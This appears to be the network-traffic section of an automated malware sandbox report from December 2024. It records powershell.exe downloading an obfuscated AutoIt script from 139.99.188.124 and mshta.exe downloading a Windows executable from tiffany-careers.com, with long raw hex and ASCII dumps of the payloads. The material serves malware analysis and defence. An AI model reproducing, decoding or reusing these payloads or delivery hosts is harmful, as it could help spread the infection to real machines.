                                                                                                        Data Ascii: U_^[]}fFXffF\ft_fF`ffFdfEP74I9^Xt=9^\tEEP7I9^`9^d{}tfEffEfUwLMEtAXEtA\E~A`E~Ad]
                                                                                                        Dec 23, 2024 08:39:40.260575056 CET1236INData Raw: 8b 35 f0 05 49 00 ff d6 ff 73 1c 0f b7 c0 c1 e8 0f 89 45 08 ff d6 0f b7 f0 8b 45 08 c1 ee 0f 3b 87 7c 01 00 00 0f 85 61 9b 03 00 83 7d 0c 00 74 06 89 87 7c 01 00 00 3b b7 80 01 00 00 0f 85 b5 9b 03 00 83 7d 0c 00 74 06 89 b7 80 01 00 00 5f 5e 5b
                                                                                                        Data Ascii: 5IsEE;|a}t|;}t_^[]}tx|UMVW|P;HBtt<u@MB`8t"|;Bt8t_^]2UVW};Ft
                                                                                                        Dec 23, 2024 08:39:40.260588884 CET1236INData Raw: c3 00 00 04 00 0f 85 d2 01 00 00 8b 45 20 40 f7 d8 1b c0 23 45 20 89 45 1c a8 40 0f 85 cb 97 03 00 8b 45 10 89 45 20 8b 45 0c 89 45 0c 83 7d 14 ff b9 90 01 00 00 0f 84 a8 01 00 00 83 7d 18 ff 0f 84 a6 01 00 00 83 f8 ff 75 2d 6a 00 8d 45 e8 50 6a
                                                                                                        Data Ascii: E @#E E@EE EE}}u-jEPjj0@IjXIM+MM++E} uFjEPjj0@IjXIM+MM++E @tjXIjYE uEujjPIuEjSPIE+Ej5
                                                                                                        Dec 23, 2024 08:39:40.260896921 CET1236INData Raw: f8 0f 0f 8e 8f 9b 03 00 83 f8 11 0f 84 86 9b 03 00 83 f8 14 0f 84 7d 9b 03 00 83 fe ff 0f 84 87 01 00 00 a1 10 78 4c 00 8b 04 b0 8b 18 53 89 5d e4 e8 a8 f7 ff ff 8b f8 89 7d e0 83 ff ff 0f 84 66 01 00 00 a1 24 78 4c 00 8b 55 08 8b 04 b8 8b 30 89
                                                                                                        Data Ascii: }xLS]}f$xLU0ui`WPfwLfUEM}UU(EM}U(SuWQP{`CXK\}{dEM}U}E$2@u$u u
                                                                                                        Dec 23, 2024 08:39:40.260910034 CET1236INData Raw: c0 74 0c 33 c0 40 5b 5f 5e 8b e5 5d c2 04 00 8b 4d fc 46 3b 75 08 72 c4 33 c0 eb ea 33 c0 eb e7 56 8b f1 8b 0e 85 c9 7e 1d 8b d1 0f b6 c1 c1 fa 10 81 e1 00 ff 00 00 81 e2 ff 00 00 00 c1 e0 10 0b d0 0b d1 89 16 5e c3 55 8b ec 83 ec 0c 53 56 8b c1
                                                                                                        Data Ascii: t3@[_^]MF;ur33V~^USVWPE&3fCY3x!MM9M~Fj0Zx?Ex9wAf;r<+QSRPd+MVOEj0@MEZ;E|u _^[]AF7&f2V
                                                                                                        Dec 23, 2024 08:39:40.380261898 CET1236INData Raw: a5 d5 01 00 8b 45 f8 59 89 46 04 c6 46 09 00 5b ff 0e 5f 5e 8b e5 5d c3 ff 77 1c 8b cb e8 5c 00 00 00 eb ac c6 46 09 01 eb e6 55 8b ec 56 57 8b f9 80 7f 09 00 0f 85 df 98 03 00 6a 0c e8 f1 d4 01 00 8b f0 59 85 f6 74 31 8b 45 08 83 26 00 8b 48 04
                                                                                                        Data Ascii: EYFF[_^]w\FUVWjYt1E&HNx0VGFw_^]f3UVuWtT~tv~uF~u~t)WYFF8u6vYYVY_^]vU


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        1192.168.2.649800139.99.188.124808428C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 23, 2024 08:39:43.654159069 CET77OUTGET /VmnWBYrzn.txt HTTP/1.1
                                                                                                        Host: 139.99.188.124
                                                                                                        Connection: Keep-Alive
                                                                                                        Dec 23, 2024 08:39:45.155564070 CET1236INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 23 Dec 2024 07:39:44 GMT
                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                        Last-Modified: Mon, 16 Dec 2024 07:33:56 GMT
                                                                                                        ETag: "12f072-6295e34062d02"
                                                                                                        Accept-Ranges: bytes
                                                                                                        Content-Length: 1241202
                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: text/plain
                                                                                                        Data Raw: 46 75 6e 63 20 4e 75 74 72 69 74 69 6f 6e 53 70 65 65 64 4d 61 79 6f 72 46 61 6d 69 6c 69 65 73 28 24 53 6d 4b 69 73 73 2c 20 24 45 66 66 69 63 69 65 6e 74 6c 79 46 6f 72 6d 75 6c 61 2c 20 24 43 6f 6e 73 75 6c 74 69 6e 67 53 6f 72 74 73 4c 61 62 73 2c 20 24 66 75 72 74 68 65 72 74 65 72 72 6f 72 69 73 74 2c 20 24 42 49 4b 45 4f 43 43 55 52 52 45 4e 43 45 53 4c 49 47 48 54 2c 20 24 52 65 76 65 72 73 65 50 68 69 6c 69 70 70 69 6e 65 73 29 0a 24 50 64 42 6c 6f 63 6b 73 52 65 73 70 6f 6e 73 65 44 61 74 20 3d 20 27 37 33 39 31 31 39 36 31 38 37 37 32 27 0a 24 56 65 72 69 66 69 65 64 55 6e 64 65 72 73 74 6f 6f 64 56 61 6c 69 64 61 74 69 6f 6e 20 3d 20 33 34 0a 24 69 6f 73 79 6d 70 68 6f 6e 79 73 65 65 6d 73 63 72 75 63 69 61 6c 20 3d 20 35 30 0a 46 6f 72 20 24 4f 64 48 42 74 20 3d 20 32 38 20 54 6f 20 38 36 35 0a 49 66 20 24 56 65 72 69 66 69 65 64 55 6e 64 65 72 73 74 6f 6f 64 56 61 6c 69 64 61 74 69 6f 6e 20 3d 20 33 32 20 54 68 65 6e 0a 53 71 72 74 28 37 39 35 35 29 0a 46 69 6c 65 45 78 69 73 74 73 28 [TRUNCATED]
                                                                                                        Data Ascii: Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines)$PdBlocksResponseDat = '739119618772'$VerifiedUnderstoodValidation = 34$iosymphonyseemscrucial = 50For $OdHBt = 28 To 865If $VerifiedUnderstoodValidation = 32 ThenSqrt(7955)FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3))$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1EndIfIf $VerifiedUnderstoodValidation = 33 ThenConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5))DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2))Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1))$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1EndIfIf $VerifiedUndersto
                                                                                                        Dec 23, 2024 08:39:45.155606031 CET1236INData Raw: 6f 64 56 61 6c 69 64 61 74 69 6f 6e 20 3d 20 33 34 20 54 68 65 6e 0a 24 4e 75 74 74 65 6e 49 6e 76 65 73 74 6f 72 73 52 61 6c 65 69 67 68 20 3d 20 44 65 63 28 57 61 6c 65 73 28 22 31 30 34 5d 31 31 33 5d 31 30 35 5d 38 36 5d 38 35 5d 39 36 5d 38
                                                                                                        Data Ascii: odValidation = 34 Then$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]96]83]73]78]127]105]97]79]105]77",28/4))ExitLoopEndIfNext$LAYERSSTRICTINNOVATIVE = '66150718350940696046327902621'$DmModsQueries = 68$DRESSDEARANTIQUES = 93Wh
                                                                                                        Dec 23, 2024 08:39:45.155653954 CET1236INData Raw: 6c 4c 69 62 72 61 72 69 61 6e 53 70 69 72 69 74 55 20 3d 20 24 54 68 65 6f 72 65 74 69 63 61 6c 4c 69 62 72 61 72 69 61 6e 53 70 69 72 69 74 55 20 2b 20 31 0a 45 6e 64 49 66 0a 49 66 20 24 54 68 65 6f 72 65 74 69 63 61 6c 4c 69 62 72 61 72 69 61
                                                                                                        Data Ascii: lLibrarianSpiritU = $TheoreticalLibrarianSpiritU + 1EndIfIf $TheoreticalLibrarianSpiritU = 18 Then$locateheadquarterssuccessfully = PixelGetColor(Wales("82]124]123]88]85]72]105]73]102]127]126]82]119",5/1), Wales("82]124]123]88]85]72]105]73]
                                                                                                        Dec 23, 2024 08:39:45.155670881 CET1236INData Raw: 37 29 29 0a 41 53 69 6e 28 39 39 32 29 0a 24 6d 69 73 73 69 6f 6e 73 67 72 65 65 6e 68 6f 75 73 65 20 3d 20 24 6d 69 73 73 69 6f 6e 73 67 72 65 65 6e 68 6f 75 73 65 20 2b 20 31 0a 45 6e 64 49 66 0a 49 66 20 24 6d 69 73 73 69 6f 6e 73 67 72 65 65
                                                                                                        Data Ascii: 7))ASin(992)$missionsgreenhouse = $missionsgreenhouse + 1EndIfIf $missionsgreenhouse = 96 Then$broughtisnicholasearned = ASin(9631)ExitLoopEndIfIf $missionsgreenhouse = 97 ThenDriveStatus(Wales("87]120]118]101]109]107]108]120]39",24/6
                                                                                                        Dec 23, 2024 08:39:45.155704975 CET1236INData Raw: 38 32 30 39 32 34 34 35 32 39 39 32 31 34 37 37 33 30 37 33 33 38 33 32 39 35 39 38 31 37 38 33 37 31 39 31 34 39 36 37 34 34 35 38 38 30 38 27 0a 24 44 49 4c 44 4f 53 59 49 45 4c 44 53 46 41 52 45 41 44 44 52 45 53 53 45 44 20 3d 20 33 36 0a 24
                                                                                                        Data Ascii: 82092445299214773073383295981783719149674458808'$DILDOSYIELDSFAREADDRESSED = 36$PERFECTRYAN = 64For $mdowmhS = 37 To 500If $DILDOSYIELDSFAREADDRESSED = 35 ThenPixelGetColor(107, 354, 0)Dec(Wales("76]97]107]101]115]42]73]110]115]116]97]11
                                                                                                        Dec 23, 2024 08:39:45.155739069 CET1236INData Raw: 38 29 0a 44 72 69 76 65 53 74 61 74 75 73 28 57 61 6c 65 73 28 22 39 33 5d 31 31 37 5d 31 32 33 5d 31 31 36 5d 31 30 36 5d 35 33 22 2c 33 30 2f 35 29 29 0a 43 68 72 28 38 37 37 39 29 0a 24 4c 65 73 73 50 68 6f 6e 65 20 3d 20 24 4c 65 73 73 50 68
                                                                                                        Data Ascii: 8)DriveStatus(Wales("93]117]123]116]106]53",30/5))Chr(8779)$LessPhone = $LessPhone + 1EndIfIf $LessPhone = 28 Then$adipexeditcarl = DriveStatus(Wales("79]104]75]82]80]116]89]86]125]114]75]75]81]125]90]115]95]79]128",56/8))ExitLoopEndIf
                                                                                                        Dec 23, 2024 08:39:45.155774117 CET1236INData Raw: 73 74 65 64 44 69 65 44 6f 63 73 20 2b 20 31 0a 45 6e 64 49 66 0a 57 45 6e 64 0a 24 54 61 62 6c 65 44 69 73 63 75 73 73 65 73 52 61 70 69 64 6c 79 48 69 73 74 6f 72 69 63 61 6c 20 3d 20 27 39 38 37 37 37 39 35 31 33 37 30 34 33 31 35 32 31 31 36
                                                                                                        Data Ascii: stedDieDocs + 1EndIfWEnd$TableDiscussesRapidlyHistorical = '9877795137043152116883331283765251278672396181174893270'$COACHCELLULAR = 24$AIMEDSENZSHOPSMIXER = 90For $hIEQQvE = 18 To 472If $COACHCELLULAR = 23 ThenACos(2564)Chr(8142)ASi
                                                                                                        Dec 23, 2024 08:39:45.155806065 CET1236INData Raw: 6e 65 4c 69 63 65 6e 73 65 20 2b 20 31 0a 45 6e 64 49 66 0a 57 45 6e 64 0a 24 42 61 73 6b 65 74 73 4e 65 61 72 43 75 62 61 20 3d 20 27 35 35 38 34 37 38 32 34 35 37 35 34 32 36 31 37 30 36 32 37 31 38 32 31 30 30 30 38 27 0a 24 48 65 72 65 62 79
                                                                                                        Data Ascii: neLicense + 1EndIfWEnd$BasketsNearCuba = '5584782457542617062718210008'$HerebyFaq = 55$MultiCordlessFlexRepublicans = 73While 548If $HerebyFaq = 54 ThenACos(3326)ATan(8817)Dec(Wales("78]105]124]40]40]40]40",56/7))$HerebyFaq = $Hereb
                                                                                                        Dec 23, 2024 08:39:45.155842066 CET1236INData Raw: 24 49 6d 6d 65 64 69 61 74 65 6c 79 4d 61 72 62 6c 65 49 6e 63 6f 72 70 6f 72 61 74 65 64 48 6f 75 72 20 3d 20 38 31 0a 24 61 70 70 72 6f 70 72 69 61 74 65 6c 6f 61 64 20 3d 20 38 31 0a 57 68 69 6c 65 20 39 33 33 0a 49 66 20 24 49 6d 6d 65 64 69
                                                                                                        Data Ascii: $ImmediatelyMarbleIncorporatedHour = 81$appropriateload = 81While 933If $ImmediatelyMarbleIncorporatedHour = 80 ThenConsoleWriteError(Wales("91]110]125]106]114]119]70]93]130]121]110]70",9/1))DriveStatus(Wales("90]109]117]113]118]108]102]7
                                                                                                        Dec 23, 2024 08:39:45.155877113 CET1236INData Raw: 34 5d 37 31 5d 31 30 32 5d 39 38 5d 31 31 37 5d 33 34 5d 36 36 5d 31 30 39 5d 31 30 34 5d 31 30 32 5d 31 31 35 5d 31 30 36 5d 39 38 5d 33 34 5d 38 33 5d 31 30 32 5d 39 39 5d 31 31 32 5d 31 31 38 5d 31 31 31 5d 31 30 31 5d 33 34 22 2c 32 2f 32 29
                                                                                                        Data Ascii: 4]71]102]98]117]34]66]109]104]102]115]106]98]34]83]102]99]112]118]111]101]34",2/2))$REJECTRESERVOIRLOCKENJOYED = $REJECTRESERVOIRLOCKENJOYED + 1EndIfIf $REJECTRESERVOIRLOCKENJOYED = 88 ThenExp(7839)Exp(4168)PixelGetColor(41, 632, 0)$REJ
                                                                                                        Dec 23, 2024 08:39:45.275599957 CET1236INData Raw: 6c 65 67 61 6c 20 3d 20 32 37 20 54 68 65 6e 0a 41 53 69 6e 28 34 32 39 37 29 0a 41 54 61 6e 28 36 33 33 33 29 0a 46 69 6c 65 45 78 69 73 74 73 28 57 61 6c 65 73 28 22 36 38 5d 31 31 39 5d 31 31 38 5d 31 31 38 5d 31 31 33 5d 31 31 32 5d 33 35 5d
                                                                                                        Data Ascii: legal = 27 ThenASin(4297)ATan(6333)FileExists(Wales("68]119]118]118]113]112]35]82]107]117]117]35]73]116]99]112]118]35]70]99]111]35",8/4))$DiscoIllegal = $DiscoIllegal + 1EndIfIf $DiscoIllegal = 28 ThenPixelGetColor(Wales("95]106]117]126


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        0192.168.2.649719147.45.49.1554435172C:\Windows\System32\mshta.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-23 07:39:18 UTC334OUTGET /ghepduy1325 HTTP/1.1
                                                                                                        Accept: */*
                                                                                                        Accept-Language: en-CH
                                                                                                        UA-CPU: AMD64
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                        Host: tiffany-careers.com
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-12-23 07:39:19 UTC397INHTTP/1.1 200 OK
                                                                                                        etag: "6bb0f-6767070e-23c3c;;;"
                                                                                                        last-modified: Sat, 21 Dec 2024 18:21:02 GMT
                                                                                                        content-length: 441103
                                                                                                        accept-ranges: bytes
                                                                                                        date: Mon, 23 Dec 2024 07:39:18 GMT
                                                                                                        server: LiteSpeed
                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                        connection: close
                                                                                                        2024-12-23 07:39:19 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 1b 8a 28 f3 7a e4 7b f3 7a e4 7b f3 7a e4 7b e7 11 e7 7a f0 7a e4 7b e7 11 e0 7a e4 7a e4 7b e7 11 e1 7a f4 7a e4 7b e7 11 e5 7a ee 7a e4 7b f3 7a e5 7b da 7b e4 7b e7 11 ed 7a e0 7a e4 7b e7 11 1b 7b f2 7a e4 7b e7 11 e6 7a f2 7a e4 7b 52 69 63 68 f3 7a e4 7b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 b4 fd 18 da 00 00 00
                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$(z{z{z{zz{zz{zz{zz{z{{{zz{{z{zz{Richz{PEL
                                                                                                        2024-12-23 07:39:19 UTC16384INData Raw: 33 d2 89 10 89 13 89 17 85 f6 0f 84 89 00 00 00 8d 41 02 89 45 fc 66 8b 01 83 c1 02 66 3b c2 75 f5 2b 4d fc d1 f9 74 71 83 f9 03 77 6c 6a 30 58 89 45 fc 85 c9 74 16 66 8b 04 56 66 2b 45 fc 66 83 f8 09 77 54 42 3b d1 72 ed 6a 30 58 83 f9 03 75 1d 8b 4d f8 0f b7 06 6a 30 5a 2b c2 89 01 0f b7 46 02 2b c2 89 03 0f b7 46 04 2b c2 eb 15 83 f9 02 75 14 0f b7 06 6a 30 59 2b c1 89 03 0f b7 46 02 2b c1 89 07 eb 0c 83 f9 01 75 07 0f b7 0e 2b c8 89 0f 33 c0 40 eb 02 33 c0 5f 5e 5b c9 c2 08 00 8b ff 55 8b ec 83 ec 14 53 56 57 85 c9 74 5c 83 65 fc 00 83 65 f4 00 6a 03 58 66 89 45 ec 8d 45 fc 50 68 e0 14 40 00 6a fc 51 ff 15 10 13 41 00 85 c0 75 37 8b 45 fc 85 c0 74 30 8b 18 8d 75 ec 83 ec 10 8b fc 8b 4b 54 6a 01 a5 50 a5 a5 a5 ff 15 4c 14 41 00 ff 53 54 8b 45 fc 50 8b
                                                                                                        Data Ascii: 3AEff;u+Mtqwlj0XEtfVf+EfwTB;rj0XuMj0Z+F+F+uj0Y+F+u+3@3_^[USVWt\eejXfEEPh@jQAu7Et0uKTjPLASTEP
                                                                                                        2024-12-23 07:39:19 UTC16384INData Raw: 5e eb 0b ff 72 f4 8b cb 52 e8 53 02 00 00 5f 8b c3 5b 5d c2 04 00 6a 08 b8 10 ed 40 00 e8 52 5b 00 00 8b f1 89 75 f0 68 78 02 41 00 e8 6f ba ff ff ff 75 08 83 65 fc 00 8b ce e8 1c 00 00 00 84 c0 75 0a ff 75 08 8b ce e8 57 ff ff ff 83 4d fc ff 8b c6 e8 ea 5a 00 00 c2 04 00 8b ff 55 8b ec 51 8b 45 08 32 d2 85 c0 74 12 a9 00 00 ff ff 75 0b 0f b7 c0 50 e8 52 c7 ff ff b2 01 8a c2 59 5d c2 04 00 6a 04 b8 44 ed 40 00 e8 e5 5a 00 00 8b d1 83 65 f0 00 8b 7d 0c 85 ff 79 02 33 ff 8b 75 10 85 f6 79 02 33 f6 b8 ff ff ff 7f 2b c7 3b c6 7c 67 8b 1a 8d 04 37 8b 4b f4 3b c1 7e 04 8b f1 2b f7 3b f9 7e 02 33 f6 85 ff 75 28 3b f1 75 24 8d 4b f0 e8 38 c8 ff ff 8b 4d 08 83 c0 10 89 01 21 7d fc c7 45 f0 01 00 00 00 8b c1 e8 51 5a 00 00 c2 0c 00 8b ca e8 bb c7 ff ff 8b 4d 08 50
                                                                                                        Data Ascii: ^rRS_[]j@R[uhxAoueuuWMZUQE2tuPRY]jD@Ze}y3uy3+;|g7K;~+;~3u(;u$K8M!}EQZMP
                                                                                                        2024-12-23 07:39:19 UTC16384INData Raw: fc 8d 41 28 57 8b 7d fc 89 45 fc 3b f8 74 3b 53 56 8b 1f 85 db 74 24 8b f3 8b 5b 04 8d 4e 08 e8 c0 e8 ff ff 56 6a 00 ff 15 f4 11 41 00 50 ff 15 dc 12 41 00 85 db 75 df 8b 45 fc c7 07 00 00 00 00 83 c7 04 3b f8 75 c9 5e 5b 5f c9 c3 8b ff 55 8b ec 56 57 8b 39 33 f6 56 6a ff 57 ff 15 30 12 41 00 b9 80 00 00 00 3d 02 01 00 00 74 08 85 c0 74 0c 3b c1 75 15 85 c0 74 04 3b c1 75 02 8b f7 8b 45 08 5f 89 30 5e 5d c2 10 00 51 8b 4d 04 e8 1e e4 ff ff cc 8b ff 55 8b ec 51 53 56 8b f1 8b da 33 c9 57 3b f3 74 45 8b 7d 08 85 ff 74 3e 66 39 0f 74 39 8b cf e8 47 df ff ff 2b de 89 45 fc 3b d8 73 0c 8b 45 0c 85 c0 74 2b 83 20 00 eb 26 50 57 53 56 ff 15 1c 14 41 00 8b 45 0c 83 c4 10 85 c0 74 02 89 30 8b 45 fc 03 c6 eb 0b 8b 45 0c 85 c0 74 02 89 08 8b c6 5f 5e 5b c9 c2 08 00
                                                                                                        Data Ascii: A(W}E;t;SVt$[NVjAPAuE;u^[_UVW93VjW0A=tt;ut;uE_0^]QMUQSV3W;tE}t>f9t9G+E;sEt+ &PWSVAEt0EEt_^[
                                                                                                        2024-12-23 07:39:19 UTC16384INData Raw: ac 31 01 00 7c 31 01 00 42 31 01 00 16 31 01 00 ec 30 01 00 c0 30 01 00 8e 30 01 00 60 30 01 00 30 30 01 00 fe 2f 01 00 c0 2f 01 00 8e 2f 01 00 6c 2f 01 00 0e 2f 01 00 da 2e 01 00 b6 2e 01 00 90 2e 01 00 48 2e 01 00 f8 2d 01 00 a8 2d 01 00 5a 2d 01 00 26 2d 01 00 f0 2c 01 00 b0 2c 01 00 6a 2c 01 00 40 2c 01 00 1a 2c 01 00 ec 2b 01 00 c0 2b 01 00 78 2b 01 00 48 2b 01 00 20 2b 01 00 e6 2a 01 00 aa 2a 01 00 72 2a 01 00 2c 2a 01 00 fa 29 01 00 a6 29 01 00 7a 29 01 00 4c 29 01 00 1e 29 01 00 f4 28 01 00 b2 28 01 00 56 28 01 00 20 28 01 00 ca 27 01 00 7a 27 01 00 3c 27 01 00 06 27 01 00 d0 26 01 00 7e 26 01 00 4c 26 01 00 22 26 01 00 ee 25 01 00 a8 25 01 00 6a 25 01 00 32 25 01 00 e4 24 01 00 a8 24 01 00 74 24 01 00 3e 24 01 00 08 24 01 00 cc 23 01 00 8e 23 01
                                                                                                        Data Ascii: 1|1B11000`000///l//...H.--Z-&-,,j,@,,++x+H+ +**r*,*))z)L))((V( ('z'<''&~&L&"&%%j%2%$$t$>$$##
                                                                                                        2024-12-23 07:39:19 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 1b 8a 28 f3 7a e4 7b f3 7a e4 7b f3 7a e4 7b e7 11 e7 7a f0 7a e4 7b e7 11 e0 7a e4 7a e4 7b e7 11 e1 7a f4 7a e4 7b e7 11 e5 7a ee 7a e4 7b f3 7a e5 7b da 7b e4 7b e7 11 ed 7a e0 7a e4 7b e7 11 1b 7b f2 7a e4 7b e7 11 e6 7a f2 7a e4 7b 52 69 63 68 f3 7a e4 7b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 b4 fd 18 da 00 00 00
                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$(z{z{z{zz{zz{zz{zz{z{{{zz{{z{zz{Richz{PEL
                                                                                                        2024-12-23 07:39:19 UTC16384INData Raw: 33 d2 89 10 89 13 89 17 85 f6 0f 84 89 00 00 00 8d 41 02 89 45 fc 66 8b 01 83 c1 02 66 3b c2 75 f5 2b 4d fc d1 f9 74 71 83 f9 03 77 6c 6a 30 58 89 45 fc 85 c9 74 16 66 8b 04 56 66 2b 45 fc 66 83 f8 09 77 54 42 3b d1 72 ed 6a 30 58 83 f9 03 75 1d 8b 4d f8 0f b7 06 6a 30 5a 2b c2 89 01 0f b7 46 02 2b c2 89 03 0f b7 46 04 2b c2 eb 15 83 f9 02 75 14 0f b7 06 6a 30 59 2b c1 89 03 0f b7 46 02 2b c1 89 07 eb 0c 83 f9 01 75 07 0f b7 0e 2b c8 89 0f 33 c0 40 eb 02 33 c0 5f 5e 5b c9 c2 08 00 8b ff 55 8b ec 83 ec 14 53 56 57 85 c9 74 5c 83 65 fc 00 83 65 f4 00 6a 03 58 66 89 45 ec 8d 45 fc 50 68 e0 14 40 00 6a fc 51 ff 15 10 13 41 00 85 c0 75 37 8b 45 fc 85 c0 74 30 8b 18 8d 75 ec 83 ec 10 8b fc 8b 4b 54 6a 01 a5 50 a5 a5 a5 ff 15 4c 14 41 00 ff 53 54 8b 45 fc 50 8b
                                                                                                        Data Ascii: 3AEff;u+Mtqwlj0XEtfVf+EfwTB;rj0XuMj0Z+F+F+uj0Y+F+u+3@3_^[USVWt\eejXfEEPh@jQAu7Et0uKTjPLASTEP
                                                                                                        2024-12-23 07:39:19 UTC16384INData Raw: 5e eb 0b ff 72 f4 8b cb 52 e8 53 02 00 00 5f 8b c3 5b 5d c2 04 00 6a 08 b8 10 ed 40 00 e8 52 5b 00 00 8b f1 89 75 f0 68 78 02 41 00 e8 6f ba ff ff ff 75 08 83 65 fc 00 8b ce e8 1c 00 00 00 84 c0 75 0a ff 75 08 8b ce e8 57 ff ff ff 83 4d fc ff 8b c6 e8 ea 5a 00 00 c2 04 00 8b ff 55 8b ec 51 8b 45 08 32 d2 85 c0 74 12 a9 00 00 ff ff 75 0b 0f b7 c0 50 e8 52 c7 ff ff b2 01 8a c2 59 5d c2 04 00 6a 04 b8 44 ed 40 00 e8 e5 5a 00 00 8b d1 83 65 f0 00 8b 7d 0c 85 ff 79 02 33 ff 8b 75 10 85 f6 79 02 33 f6 b8 ff ff ff 7f 2b c7 3b c6 7c 67 8b 1a 8d 04 37 8b 4b f4 3b c1 7e 04 8b f1 2b f7 3b f9 7e 02 33 f6 85 ff 75 28 3b f1 75 24 8d 4b f0 e8 38 c8 ff ff 8b 4d 08 83 c0 10 89 01 21 7d fc c7 45 f0 01 00 00 00 8b c1 e8 51 5a 00 00 c2 0c 00 8b ca e8 bb c7 ff ff 8b 4d 08 50
                                                                                                        Data Ascii: ^rRS_[]j@R[uhxAoueuuWMZUQE2tuPRY]jD@Ze}y3uy3+;|g7K;~+;~3u(;u$K8M!}EQZMP
                                                                                                        2024-12-23 07:39:19 UTC16384INData Raw: fc 8d 41 28 57 8b 7d fc 89 45 fc 3b f8 74 3b 53 56 8b 1f 85 db 74 24 8b f3 8b 5b 04 8d 4e 08 e8 c0 e8 ff ff 56 6a 00 ff 15 f4 11 41 00 50 ff 15 dc 12 41 00 85 db 75 df 8b 45 fc c7 07 00 00 00 00 83 c7 04 3b f8 75 c9 5e 5b 5f c9 c3 8b ff 55 8b ec 56 57 8b 39 33 f6 56 6a ff 57 ff 15 30 12 41 00 b9 80 00 00 00 3d 02 01 00 00 74 08 85 c0 74 0c 3b c1 75 15 85 c0 74 04 3b c1 75 02 8b f7 8b 45 08 5f 89 30 5e 5d c2 10 00 51 8b 4d 04 e8 1e e4 ff ff cc 8b ff 55 8b ec 51 53 56 8b f1 8b da 33 c9 57 3b f3 74 45 8b 7d 08 85 ff 74 3e 66 39 0f 74 39 8b cf e8 47 df ff ff 2b de 89 45 fc 3b d8 73 0c 8b 45 0c 85 c0 74 2b 83 20 00 eb 26 50 57 53 56 ff 15 1c 14 41 00 8b 45 0c 83 c4 10 85 c0 74 02 89 30 8b 45 fc 03 c6 eb 0b 8b 45 0c 85 c0 74 02 89 08 8b c6 5f 5e 5b c9 c2 08 00
                                                                                                        Data Ascii: A(W}E;t;SVt$[NVjAPAuE;u^[_UVW93VjW0A=tt;ut;uE_0^]QMUQSV3W;tE}t>f9t9G+E;sEt+ &PWSVAEt0EEt_^[
